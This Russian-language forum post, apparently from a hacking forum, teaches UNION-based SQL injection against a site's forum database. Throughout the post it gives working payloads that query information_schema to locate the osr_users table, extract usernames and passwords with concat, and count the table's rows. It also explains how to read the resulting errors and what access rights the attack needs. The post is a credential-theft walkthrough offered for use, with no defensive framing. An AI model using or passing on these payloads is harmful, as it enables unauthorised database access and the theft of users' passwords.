тогда
Код:
16+union+select+1,2,3,table_schema,5,6,7,8,9,10,11,12+from+information_schema.tables+where+table_name=0x6f73725f7573657273+limit+0,1
то, что выше, выучить как отче наш, а то, что выведет на экран, надо будет добавить к имени таблице, через точку, т.к. это будет БД, в которой лежит интересующая нас таблица
Результаты будут, если у текущего юзера будут соотвествующие права на доступ к интересующей БД, т.е. к примеру на запрос выше выдаст:
1321412354123_forum
тогда следующий запрос такой:
+union+select+1,2,3,concat(username,0x3b,password) ,5,6,7,8,9,10,11,12+from+1321412354123_forum.osr_u sers
если опять выдаст ошибку, вывода только два:
1. Записей в osr_users просто нет (==0)
2. нет прав доступа
Тут можно проверить только пункт 1:
+union+select+1,2,3,count(*) ,5,6,7,8,9,10,11,12+from+1321412354123_forum.osr_u sers
если выведется "0" - то дальше думаю объяснять не надо, значит таблица пустая